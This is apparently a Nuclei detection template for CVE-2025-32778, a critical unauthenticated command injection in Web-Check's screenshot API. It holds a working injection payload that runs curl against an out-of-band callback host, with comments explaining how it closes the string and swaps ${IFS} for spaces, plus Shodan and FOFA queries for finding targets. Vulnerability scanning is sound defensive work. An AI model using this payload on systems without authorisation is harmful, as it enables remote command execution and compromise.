id: CVE-2025-32778

info:
  name: Web-Check < 2.0.1 Screenshot API - OS Command Injection
  author: gugacyber
  severity: critical
  description: |
    Lissy93/web-check before 2.0.1 contains an OS command injection caused by unsanitized user input in the screenshot API. An unauthenticated attacker who sends a crafted url parameter can execute arbitrary system commands on the host.
  impact: |
    Attackers can execute arbitrary commands on the host, potentially leading to remote code execution or full system compromise.
  remediation: |
    Upgrade Web-Check to version 2.0.1 or later. The fix replaces exec() with execFile(), which avoids shell interpretation and passes command arguments as a separate list instead of interpolating them into a command string.
  reference:
    - https://github.com/Lissy93/web-check/security/advisories/GHSA-jqhf-j4w8-4grr
    - https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32778
    - https://osv.dev/vulnerability/CVE-2025-32778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32778
    cwe-id: CWE-78
    epss-score: 0.19976
    epss-percentile: 0.97093
  metadata:
    verified: true
    max-request: 2
    vendor: lissy93
    product: web-check
    shodan-query: http.title:"Web-Check"
    fofa-query: title="Web-Check"
  tags: cve,cve2025,web-check,rce,injection,unauth,oast,vkev

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the target; the internal matcher gates request 2 so the
  # OAST payload is only sent to hosts that actually look like Web-Check.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "Web Check"
        part: body
        case-insensitive: true
        internal: true

  # Request 2: the url parameter decodes to  http://x";curl${IFS}http://<interactsh>;#
  # The quote closes the string the server interpolates the URL into, ";" ends that
  # command, ${IFS} stands in for a space so no space appears in the parameter, and "#"
  # comments out whatever follows. Confirmation is the out-of-band HTTP callback, not
  # anything in the response body.
  - raw:
      - |
        GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100deb71a8dd6dfb589d4693c70774eff1b7c2f84ca91d1c5d3e273f8ac6601adb0022041cf2f4a2bcc32f75370e56ccbccece47a7ba1a8d258e4a4dd6ba403c34715b2:922c64590222798bb761d5b6d8e72950